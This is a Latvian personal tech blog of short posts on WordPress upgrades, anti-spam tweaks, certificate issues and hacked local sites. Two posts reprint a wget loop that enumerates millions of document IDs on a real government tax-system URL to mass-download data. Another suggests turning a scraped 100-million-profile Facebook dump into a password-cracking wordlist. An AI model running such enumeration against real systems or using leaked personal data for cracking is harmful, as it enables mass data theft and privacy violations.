•
Rakstot iepriekšējo post bija nepieciešams pārbaudīt vai pirms redirekta no hanzanet.lv ir uzstādīts jaunos sertifikāts.
Vieglākais kā to izdarīt manupŗat bija aizliegt pārlūkam veikt auto redirect.
Firefox to var izdarīt šādi:
Atveram konfig failu- adreses vietā irakstām about:config
Atrodam- network.http.redirection-limit
un vērtību aizstājam ar 0.
Pēc eksperimenta nomainām uz kādu gribās.
Pārlūku nav nepieciešams pārstartēt.
•
Šodien atverot hanzanet.lv, lai pārbaudītu cik izdevies pa brīvdienām notrallināt mani pārsteidza interesanta lieta.
No sākuma iedomājos, ka kāds mēģina MITM (Man-in-the-middle attack) vai proxy serveris sācis pārtvert arī drošos savienojumus, tomēr papētot izrādās, ka vienkārši ir beidzies sertifikāta derīguma termiņš.
https://ib.swedbank.lv/ sertifikātu viss ir kārtībā.
Ņemot vērā, ka no hanzanet.lv ir vienkāršs redirekts, nekāda lielā bēda nav un iespējams Swedbanka vairs hanzanet.lv domēnam sertifikātu nepagarinās, tomēr ikdienas lietotājam tas var liekties biedējoši un kādu interneta lietotāju aizbaidīt. Tāpēc, lai tā nenotiktu banka varētu:
- vai nu sertifikātu pagarināt,
- vai uz redirektu noņemt sertifikātu,
- vai mežonīgākais- noņemt hanzanet.lv,
lai tādi iesūnojuši lietotāji, kas baksta hanzanet.lv vairs neuztrauktos un iemācītos lietot jauno adresi.
Papildināts.
Swedbanka ātri ir novērsusi problēmu un sertifikātu atjaunojusi.
•
Nejauši uzskrēju vienam bezmaksas hostingam zumic.com. Pats viņu neesmu testējis, bet lasītās atsauksmes bija tīri neko.
Cerams kādam noderēs.
•
Visiem tagad ir zināms kādā veidā tika iegūti dati no EDS sistēmas- nebija (it kā bija iestrādāta, bet testu rezultātā tika atslēgta) autentifikācija uz failu nolādes.
Kā šādu ievainojamību var izmantot tehniski biju atradis netā un pārpublicēju šeit.
Tā kā teorija un citu piemēri no prakses atšķiras, tad nodomāju patestēt.
Linux gadījumā tas varētu izskatīties šādā veidā:
for i in {1..7500000}; do
wget http://www2.vid.gov.lv/eds/Pages/GetDuf.aspx?id=$i;
done
Talak »
•
Tiko uzrakstīju post par boot izsmiešanu un gribas palasīt ko citu.
Un te seko nākamais pārsteigums- pods izsmiets.
Nu ko vēsture atkārtojas..
Pods jau vienreiz tika nonests un cik atceros toreiz autoram bija paša radīts brīnums, bez rezerves kopijām. Tagad Pods griežas(zās) uz wordpress- vai bija mācība un ir rezerves kopija uzzināsim visai drīz.
Man pašam arī pāris mēnešus atpakaļ bija nonests wordpress izmantojot wordpress ievainojamību. Kas par iemeslu bija iekš pods.lv būs interesanti noskaidrot un cerams autors neturēs sveci zem pūra. Varbūt nebija atjaunota pēdējā versija, varbūt kaut kas cits.
Iekš LV ik pa laikam kāda lapa tiek nonesta, taču neesmu dzirdējis ne par vienu sekmīgi pabeigtu izmeklēšanu un notiesājošu spriedumu. Gaidu precedentu, lai tīņi urķi nobītos un beigtu bojāt citiem garastāvokli.
Uzstādīts arī interesants redirekts uz www.kuce.lv, kas liek domāt, ka vainīgais mitinās iekš LV
No sava Hackera neaizbēgsi 
.
•
Atnākot mājās pēc vakara wake brauciena izdomāju palasīt, kas jauns noticis pasaulē.
Viss sākas ar google reader atvēršanu un tur mani sagaida brīdinājums- boot ir kaitīga lapa.
Palika interesanti..
Lasu tālāk iekš boot, ka ļaundari ir izmantojuši kādu openx ievainojamību un mājaslapā ievietojuši ļaundabīgu kodu, bet tagad viss ir ticis sakopts.
Būtu interesanti, ja Boot būtu nopublicējis kā viss tas notika un kādā veidā un ko ļaundari tieši ievietojuši un no kādām adresēm. Būtu labs un pamācošs rakstiņš.
Zelta teiciens sevi attaisno- No sava Hackera neizbēksi, tāpēc taisām rezerves kopijas
•
Šodien klejojot par netu atradu veidu kā iespējams tika nopumpēti dati no EDS sistēmas.
Viss ģeniālais ir vienkāršs un lai cilvēki redzētu cik tieši tas ir vienkārši tad pārpublicēju pašu kodu, kas varēja izskatīties aptuveni šāds:
Linux veidīgā konsolē uzrakstām un priecājamies
for i in {1..7500000}; do
wget http://www2.vid.gov.lv/eds/Pages/GetDuf.aspx?id=$i;
done
Šis piemērs parāda veidu kādā šādas ievainojamības izmantot un attiecīgi modificējot piedzīt arī citiem nedarbiem.
•
Blackhalt blogā pamanīju rakstu par facebook lietotāju publiski pieejamās informācijas apkopošanu. Raksts ar visiem torentu linkiem pieejams šeit http://blackhalt.blogspot.com/2010/08/lejupieladeti-un-sistematizeti-100.html
Raksta kopija:
Kāds Ron Bowes lejupielādējis, sistematizējis un publiskojis Facebook publiskās daļas ievērojamu daudzumu lietotāju datus.
Ja nekļūdos, tad savākti ir tikai tie lietotāju dati, kuru saturēja tikai latīņu burtus.
An additional limitation is that these are only users whose first characters are from the latin charset. I plan to add non-Latin names in future releases.
Lejupielādētie dati tika saarhivēti bz2 datņu formātos un publicēti izmantojot BitTorrent.
Lejupielādējot 2.79 GiB datņu kopu, jebkurš iegūst šādas datnes:
Filename Description
-------------------------------------------------------------------------
facebook.rb The script used to generate these files (v1)
facebook.nse The script that will be used for the second pass (v2)
facebook-urls The full URLs to every profile
facebook-names-original All names, including duplicates
facebook-names-unique All names, no duplicates
facebook-names-withcount All names, no duplicates but with a count
facebook-firstnames-withcount All first names (with count)
facebook-lastnames-withcount All last names (with count)
facebook-f.last-withcount All first initial last name (with count)
facebook-first.l-withcount All first name last initial (with count)
Manuprāt, interesantākie ir facebook-urls (URL no izmantotajiem lietotājiem) un visi vārdi un uzvārdi.
No šīm datnēm var izveidot svaigu un aktuālu (!) vārdnīcu (wordlist) - paroļu, hash utml piemeklēšanai.
Jāpiezīmē, ka atarhivējot kādu no bz2 datnēm, to izmērs var sasniegt vairākus GiB tīra teksta, piemēram, facebook-urls.txt.bz2 ~1.3 GiB būs ~9.7 GiB.
Datņu atvēršanai jāizmanto tādas programmas, kas spēj tādu datu apjomu atvērt pakāpeniski.
Saite uz torrent datni: Facebook directory - personal details for 100 million users (download torrent) - TPB
Saite uz Ron Bowes bloga ierakstu: SkullSecurity » Blog Archive » Return of the Facebook Snatchers.
P.S. Kurš pirmais publicēs analoģiskus datus par draugiem.lv?
Ko tieši darīt ar šo info nezinu, bet kā saka, lai ir informācija- kā to pielietot izdomāsim.
Kā arī liek aizdomāties par publiskā telpā pieejamās informācijas nekaitīgumu.. jo kas Tev liekas nekaitīgs kādam var izrādīties medusmaize.
•
Pamanīju, ka ir iznākusi wordpress 3.0 versija un aktīvi sāku migrācijas procesu izmantojot oficiālo manuāli:
Tas sastāvēja no 5 soļiem:
- Uztaisām lapas pilnu rezerves kopiju (mysql un failu),
- Nolādējam jauno wordpress un to atarhivējam,
- Izdzēšam
wp-includes un wp-admin direktoijas,
- kopējam pa virsu jaunos failus (izņemot wp-content direktoriju!!! tai jāsaglabājas vecajai),
- Pirmo reizi logojoties administrēšanas panelī piedāvā izmainīt datubāzes struktūru, to izdarām.
Atjaunināšanas process ir beidzies veiksmīgi.
Ērtāk noteikti būtu izmantot automātisko atjaunināšanas fīču- tiem, kas nav nogriezuši apache lietotājam tiesības rakstīt/dzēst.
Uz ātro nekādas lielas izmaiņas neredzu, ja nu vienīgi administrēšanas panelī background no tumši pelēka ir pārvērties gaiši pelēkā un apziņa- lietoju jaunāko
Papildinājums- aiz intereses sameklēju, kas tad ir īsti jauns 3.0 versijā un kā izrādās ļoti daudz un būtiskas izmaiņas, no kurām man šķita svarīgākās:
- izvēlēties lietotājvārdu instalācijas laikā- jo pēc tam nav jāveido jauns lietotājs un jādzēš ārā admin,
- plašākas pielāgošanas iespējas, kas samazina nepieciešamību labot wordpress failus manuāli (kas man ļoti kaitināja salīdzinot wordpress ar joomlu, kur gandrīz visu varēja izdarīt nelienot pašā kodā).
•
Nedēļu atpakaļ notika vēl viens interesants notikums, par kuru nebija laiks uzrakstīt.
Bet tā kā tas bija gana aizraujošs un iespējams kādam ļoti noderīgs, tad 6dienas dienā nolēmu to aprakstīt.
Viss sākās ar to, ka atnākot 5dien mājās atvēru pārlūkā savu blogu un tur man priekšā sagaidīja šāda bilde:
Talak »
•
Vakar izdomāju sakārtot savu WEB saimniecību un izdzēst uz servera aktualitāti zaudējušas lietas- dažādas testa lapas, izstrādes vides, utt.
Tā kā esmu jau aizmirsi, kas man tikai nestāv atveru FTP klientu, lai paskatītos direktoriju saturu.
Identificēju trīs izstrādes lapas, kuras jau ir nodotas un tātad tās var dzēst ārā. Tā kā miglaini atceros, kuras tās bija, tad ar lielu interesi ievadu pirmo:
http://dll.lv/test
Un mani sagaida brīnums
Neliels pārsteigums… Talak »
•
Kā ziņo ABCnews.com Krievu hakerim ir izdevies nozagt Facebook lietotāju lietotājvārdus un paroles, kā arī viņš piedāvā tās iegādāties par 0,25$ vai 0,45$ (ja konkrētam lietotājam ir vismaz 10 draugu) gabalā.
Diemžēl (kas mai vairāk intresē) netiek ziņots kādā veidā viņam izdevies tās iegūt. Talak »
•
Šorīt no rīta sagribējās izdarīt kaut ko paliekošu un sabiedrībai interesantu.
Pirmais, kas ienāca prāta bija uzrakstīt plugin priekš wordpress, kas ļautu ievietot komentārus ar draugiem.lv pasi.
Tā apņēmības un entuziasma pilns jau ķēros pie darba, kad ienāca prātā iemest google vai kāds meistars jau nav pacenties un vai netaisos izgudrot divriteni otrreiz..
Par nožēlu priekš manis pirmais rezultāts ievadot draugiem.lv pase wordpress izlec Ģirta Upīša rakstītais plugins.
Žēl..
Apskatot pēdējās relīzes (pagaidām divas 1.0 un 1.1) datumu- 2010.04.13 izdaru secinājumu, ka nokavēju tikai nedaudz.
Kāpēc šī ideja neienāca 1 mēnesi atpakaļ?
Nekas domāsim tālāk kā izpausties brīvos brīžos.
•
Veidojot vienu lapu radās neikdienišķa situācija- bija nepieciešams izmainīt jau php izveidoto kodu un aizstāt to ar citu, ja izvadītajā html kodā ir sastopams cits unikāls kods.
Kā vienīgais risinājums man ienāca prātā javascript.
Iespējams kādam tas liksies gaužām vienkārši, tomēr man, kas ir “uz jūs” ar javascript izveidot šīs pāris rindiņas bija diezgan ķepīgi un laikietilpīgi.
Nu tad, lūk, pati funkcija un paskaidrojumi:
<script type="text/javascript">
//izsaucam funkciju pie ielādes
window.onload=gethtml; Talak »
•
WordPress piedāvā iebūvētu un vienkāršu veidu kā atbrīvoties no spama- Akisment, kura spēku var palielināt sadaļā:
Iestatījumi->Diskusijas ierakstot papildus frāzes vai IP adreses, kas liecinās par spamu. Dažas adreses, kuras nomocīja mani:
194.8.75.149
194.8.75.163
87.118.118.133
194.8.74.220
92.112.
92.113.
Bet pavisam nejauši uzdūros vecam pods.lv rakstam, kurā vienkārši ieteikts ar javascript palīdzību pamainīt komentu saņemšanas lapas adresi. Piemērs rakstīts wordpress, bet to tik pat vienkārši var pielāgot jebkurai citai lapai.
Kas tādā veidā tiks izdarīts?
Ja nebūs ieslēgts javascript atbalsts, tad ievadot komentāru tas tiks padots citai lapai, piemēram, /spaamms/ nevis comments.php. Tas sniedz rezultātu, jo daudzām spamotāju sistēmām nav ieslēgts javascript.
Lai izskatītos korektāk var arī izveidot šādu lapu ( dll.lv/spaammss), kurā populārzinātniski paskaidrotu, kas noticis.
Papildus tam pirms komentēšanas formas tiks izvadīs paziņojumu, ka jābūt ieslēgtam javascript, lai komentētu.
Lai to izdarītu atrodam wordpress templeita comments.php failu, kas atrodas “web root/wp-content/themes/temas_nosaukums/comments.php”
Atrodam šādu rindiņu:
<form action="<?php echo get_option('siteurl'); ?>/wp-comments-post.php” method=”post” id=”commentform”>
un aizstājam to ar:
<form action="<?php echo get_option('siteurl'); ?>/spaamms/" method="post" id="commentform">
<script type="text/javascript">
document.getElementById('commentform').action = "<?php echo get_option('siteurl'); ?>/wp-comments-post.php";
</script>
<noscript>
<p><strong class="postdate">Lai izmantotu komentēšanas iespēju, pārlūkā jābūt ieslēgtam JavaScript atbalstam!</strong>. Kaut kā taču ir jāmēģina cīnīties ar komentāru piedrazotājiem.</p>
</noscript>
Papildus tam, lai daži spamotāji pa taisno neievietotu komentārus, nomainīju komentāru apstrādājamā faila nosaukumu tai pašā failā:
document.getElementById('commentform').action = "<?php echo get_option('siteurl'); ?>/wp-comments-post.php";
uz:
document.getElementById('commentform').action = "<?php echo get_option('siteurl'); ?>/wp-comments-post_n123.php";
un, protams, tad arī pats komentāru apstrādājošais fails jāpārsauc- atrodas web root/wp-comments-posts.php uz wp-comments-post_n123.php
Es tagad tiešām ceru, ka ar to pietiks…
